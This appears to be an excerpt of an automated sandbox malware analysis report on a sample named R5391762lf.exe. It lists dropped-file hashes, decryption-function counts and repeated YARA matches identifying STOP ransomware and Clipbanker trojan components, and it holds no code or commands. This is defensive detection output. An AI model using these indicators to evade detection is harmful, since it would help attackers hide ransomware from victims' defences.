Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EE18D0	6_2_05EE18D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7880	6_2_05EC7880
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECDBE0	6_2_05ECDBE0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC2B60	6_2_05EC2B60
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ED0B00	6_2_05ED0B00
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7A80	6_2_05EC7A80
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECCA10	6_2_05ECCA10

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: String function: 05EF0160 appears 50 times
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: String function: 05EE8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05EC8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05ED0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05DE0160 appears 50 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 05DD8EC0 appears 57 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 0042F7C0 appears 99 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: String function: 00454E50 appears 42 times

Sample file is different than original file name gathered from version info

Source: R5391762lf.exe, 00000000.00000002.1373459929.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000003.1391294965.0000000002F71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000002.00000000.1370901949.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000005.00000002.1404961018.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000006.00000002.1410752976.00000000040A1000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe
Source: R5391762lf.exe, 00000007.00000000.1401160691.00000000040A1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs R5391762lf.exe

Uses 32bit PE files

Source: R5391762lf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
